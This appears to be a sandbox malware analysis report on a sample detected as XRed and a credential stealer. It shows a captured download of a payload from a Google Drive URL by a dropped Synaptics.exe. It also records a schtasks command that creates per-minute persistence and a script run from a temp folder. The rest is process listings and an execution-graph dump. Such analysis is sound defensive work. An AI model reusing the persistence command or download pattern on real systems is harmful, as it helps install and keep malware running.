                                                                                                                      2024-12-30 10:34:38 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 72 44 37 47 55 62 53 73 78 55 73 4d 6c 64 33 48 47 4a 32 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="vrD7GUbSsxUsMld3HGJ2ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:34:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.849723172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:38 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Y3bJEG5p0TCqg2Ba5miLCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.849724172.217.16.2064438036C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:34:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:34:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:34:38 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-DFAUUBpDwP7UUzXPFjwRoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:05:34:19
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\FGNEBI.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\FGNEBI.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'691'136 bytes
                                                                                                                      MD5 hash:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:05:34:19
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\._cache_FGNEBI.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_FGNEBI.exe"
                                                                                                                      Imagebase:0xd90000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 47%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:3
                                                                                                                      Start time:05:34:19
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:34:21
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                      Imagebase:0xb00000
                                                                                                                      File size:53'161'064 bytes
                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:34:22
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                      Imagebase:0xa40000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:34:22
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:34:22
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
                                                                                                                      Imagebase:0xd80000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2657921440.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:34:22
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                      Imagebase:0x780000
                                                                                                                      File size:187'904 bytes
                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:05:34:24
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 47%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:15
                                                                                                                      Start time:05:34:31
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
                                                                                                                      Imagebase:0x2b0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:16
                                                                                                                      Start time:05:34:33
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:19
                                                                                                                      Start time:05:34:37
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
                                                                                                                      Imagebase:0x2b0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:22
                                                                                                                      Start time:05:34:40
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292
                                                                                                                      Imagebase:0x2b0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:23
                                                                                                                      Start time:05:34:40
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772
                                                                                                                      Imagebase:0x2b0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:24
                                                                                                                      Start time:05:34:41
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:771'584 bytes
                                                                                                                      MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Has exited:true

                                                                                                                      Target ID:25
                                                                                                                      Start time:05:34:50
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:26
                                                                                                                      Start time:05:34:59
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:27
                                                                                                                      Start time:05:35:01
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Target ID:30
                                                                                                                      Start time:05:36:00
                                                                                                                      Start date:30/12/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                      Imagebase:0x1e0000
                                                                                                                      File size:919'552 bytes
                                                                                                                      MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4.4%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:10.2%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:31
                                                                                                                        execution_graph 103776 da1118 104321 dae016 103776->104321 103778 da112e 103779 da1148 103778->103779 103780 e0abeb 103778->103780 104330 da3680 103779->104330 104419 dacf79 49 API calls 103780->104419 103784 e0ac2a 103787 e0ac4a Mailbox 103784->103787 104420 ddba5d 48 API calls 103784->104420 103785 e0b628 Mailbox 104427 ddd520 86 API calls 4 library calls 103787->104427 103790 da105e 104421 d9c935 103790->104421 103791 da0119 104430 ddd520 86 API calls 4 library calls 103791->104430 103793 da0dee 104401 d9d89e 103793->104401 103794 d9c935 48 API calls 103817 d9fad8 Mailbox _memmove 103794->103817 103795 e0b772 104431 ddd520 86 API calls 4 library calls 103795->104431 103796 da1063 104429 ddd520 86 API calls 4 library calls 103796->104429 103798 da0dfa 103802 d9d89e 50 API calls 103798->103802 103804 da0e83 103802->103804 103803 db010a 48 API calls 103803->103817 104411 d9caee 103804->104411 103805 d9d3d2 48 API calls 103805->103817 103807 e0b7d2 103808 dca599 InterlockedDecrement 103808->103817 103809 db1b2a 52 API calls __cinit 103809->103817 103813 da1230 103815 d9fbf1 Mailbox 103813->103815 104428 ddd520 86 API calls 4 library calls 103813->104428 103817->103790 103817->103791 103817->103793 103817->103794 103817->103795 103817->103796 103817->103798 103817->103803 103817->103804 103817->103805 103817->103808 103817->103809 103817->103813 103817->103815 103820 e0b583 103817->103820 103822 da10f1 Mailbox 103817->103822 103841 d9f6d0 103817->103841 103913 d9fa40 103817->103913 103969 de013f 103817->103969 103982 deb74b VariantInit 103817->103982 104023 df17aa 103817->104023 104028 df10e5 103817->104028 104034 daef0d 103817->104034 104077 df0bfa 103817->104077 104080 daf461 103817->104080 104118 d950a3 103817->104118 104123 daf03e 103817->104123 104126 de9122 103817->104126 104140 de8065 GetCursorPos GetForegroundWindow 103817->104140 104154 df804e 103817->104154 104168 df1f19 103817->104168 104171 de92c0 103817->104171 104189 dadd84 103817->104189 104192 d981c6 103817->104192 104262 df798d 103817->104262 104267 df30ad 103817->104267 104400 da1620 59 API calls Mailbox 103817->104400 104415 deee52 82 API calls 2 library calls 103817->104415 104416 deef9d 90 API calls Mailbox 103817->104416 104417 ddb020 48 API calls 103817->104417 104418 dee713 413 API calls Mailbox 103817->104418 104425 ddd520 86 API calls 4 library calls 103820->104425 104426 ddd520 86 API calls 4 library calls 103822->104426 103842 d9f708 103841->103842 103843 d9f77b 103841->103843 103844 e0c4d5 103842->103844 103845 d9f712 103842->103845 103847 e0c253 103843->103847 103886 d9f787 103843->103886 103848 e0c4e2 103844->103848 103849 e0c4f4 103844->103849 103850 d9f71c 103845->103850 103865 e0c544 103845->103865 103846 d9fa40 413 API calls 103846->103886 104471 ddd520 86 API calls 4 library calls 103847->104471 104432 def34f 103848->104432 104479 dec235 413 API calls Mailbox 103849->104479 103855 e0c6a4 103850->103855 103861 d9f72a 103850->103861 103912 d9f741 103850->103912 103851 e0c585 103862 e0c590 103851->103862 103863 e0c5a4 103851->103863 103858 d9c935 48 API calls 103855->103858 103856 e0c264 103856->103817 103857 e0c507 103860 e0c50b 103857->103860 103857->103912 103858->103912 104480 ddd520 86 API calls 4 library calls 103860->104480 103861->103912 104510 dca599 InterlockedDecrement 103861->104510 103867 def34f 413 API calls 103862->103867 104482 ded154 48 API calls 103863->104482 103865->103851 103878 e0c569 103865->103878 103866 d9f770 Mailbox 103866->103817 103867->103912 103869 e0c45a 103872 d9c935 48 API calls 103869->103872 103870 e0c7b5 103877 e0c7eb 103870->103877 104532 deef9d 90 API calls Mailbox 103870->104532 103871 e0c5af 103885 e0c62c 103871->103885 103896 e0c5d1 103871->103896 103872->103912 103876 d9f84a 103880 e0c32a 103876->103880 103893 d9f854 103876->103893 103882 d9d89e 50 API calls 103877->103882 104481 ddd520 86 API calls 4 library calls 103878->104481 103879 e0c793 104512 d984a6 103879->104512 104472 d9342c 103880->104472 103882->103866 104507 ddafce 48 API calls 103885->104507 103886->103846 103886->103866 103886->103876 103889 d9f8bb 103886->103889 103891 db2241 48 API calls 103886->103891 103897 d9f9d8 103886->103897 103887 e0c7c9 103892 d984a6 81 API calls 103887->103892 103889->103856 103889->103869 103889->103912 104476 dca599 InterlockedDecrement 103889->104476 104478 def4df 413 API calls 103889->104478 103891->103886 103903 e0c7d1 __NMSG_WRITE 103892->103903 104455 da14a0 103893->104455 103895 d9f8ab 103895->103889 103895->103897 104483 dda485 48 API calls 103896->104483 104477 ddd520 86 API calls 4 library calls 103897->104477 103899 e0c79b __NMSG_WRITE 103899->103870 103901 d9d89e 50 API calls 103899->103901 103900 e0c63e 104508 dadf08 48 API calls 103900->104508 103901->103870 103903->103877 103906 d9d89e 50 API calls 103903->103906 103905 e0c5f6 104484 da44e0 103905->104484 103906->103877 103907 e0c647 Mailbox 104509 dda485 48 API calls 103907->104509 103910 e0c663 103911 da3680 413 API calls 103910->103911 103911->103912 103912->103866 103912->103870 104511 deee52 82 API calls 2 library calls 103912->104511 103914 d9fa60 103913->103914 103950 d9fa8e Mailbox _memmove 103913->103950 103915 db010a 48 API calls 103914->103915 103915->103950 103916 da105e 103917 d9c935 48 API calls 103916->103917 103942 d9fbf1 Mailbox 103917->103942 103918 d9d3d2 48 API calls 103918->103950 103920 da0119 105424 ddd520 86 API calls 4 library calls 103920->105424 103922 da1063 105423 ddd520 86 API calls 4 library calls 103922->105423 103924 db1b2a 52 API calls __cinit 103924->103950 103925 da0dee 103929 d9d89e 50 API calls 103925->103929 103926 d9c935 48 API calls 103926->103950 103927 e0b772 105425 ddd520 86 API calls 4 library calls 103927->105425 103928 da0dfa 103930 d9d89e 50 API calls 103928->103930 103929->103928 103934 da0e83 103930->103934 103932 db010a 48 API calls 103932->103950 103933 d9f6d0 413 API calls 103933->103950 103937 d9caee 48 API calls 103934->103937 103936 e0b7d2 103949 da10f1 Mailbox 103937->103949 103940 da1230 103940->103942 105422 ddd520 86 API calls 4 library calls 103940->105422 103942->103817 103943 d9fa40 413 API calls 103943->103950 103946 dca599 InterlockedDecrement 103946->103950 103947 e0b583 105420 ddd520 86 API calls 4 library calls 103947->105420 105421 ddd520 86 API calls 4 library calls 103949->105421 103950->103916 103950->103918 103950->103920 103950->103922 103950->103924 103950->103925 103950->103926 103950->103927 103950->103928 103950->103932 103950->103933 103950->103934 103950->103940 103950->103942 103950->103943 103950->103946 103950->103947 103950->103949 103951 de013f 87 API calls 103950->103951 103952 daf03e 2 API calls 103950->103952 103953 df0bfa 129 API calls 103950->103953 103954 df1f19 132 API calls 103950->103954 103955 df804e 113 API calls 103950->103955 103956 df30ad 93 API calls 103950->103956 103957 df798d 109 API calls 103950->103957 103958 deb74b 413 API calls 103950->103958 103959 df17aa 87 API calls 103950->103959 103960 daef0d 94 API calls 103950->103960 103961 df10e5 82 API calls 103950->103961 103962 d950a3 49 API calls 103950->103962 103963 daf461 98 API calls 103950->103963 103964 de8065 55 API calls 103950->103964 103965 de9122 91 API calls 103950->103965 103966 dadd84 3 API calls 103950->103966 103967 de92c0 88 API calls 103950->103967 103968 d981c6 85 API calls 103950->103968 105415 da1620 59 API calls Mailbox 103950->105415 105416 deee52 82 API calls 2 library calls 103950->105416 105417 deef9d 90 API calls Mailbox 103950->105417 105418 ddb020 48 API calls 103950->105418 105419 dee713 413 API calls Mailbox 103950->105419 103951->103950 103952->103950 103953->103950 103954->103950 103955->103950 103956->103950 103957->103950 103958->103950 103959->103950 103960->103950 103961->103950 103962->103950 103963->103950 103964->103950 103965->103950 103966->103950 103967->103950 103968->103950 103970 de015e 103969->103970 103971 de0157 103969->103971 103972 d984a6 81 API calls 103970->103972 103973 d984a6 81 API calls 103971->103973 103972->103971 103974 de017c 103973->103974 105426 dd76db GetFileVersionInfoSizeW 103974->105426 103976 de018d 103977 de0192 103976->103977 103979 de01a3 _wcscmp 103976->103979 103978 d9ca8e 48 API calls 103977->103978 103981 de01a1 103978->103981 103980 d9ca8e 48 API calls 103979->103980 103980->103981 103981->103817 103983 d9ca8e 48 API calls 103982->103983 103984 deb7a3 CoInitialize 103983->103984 103985 deb7ae 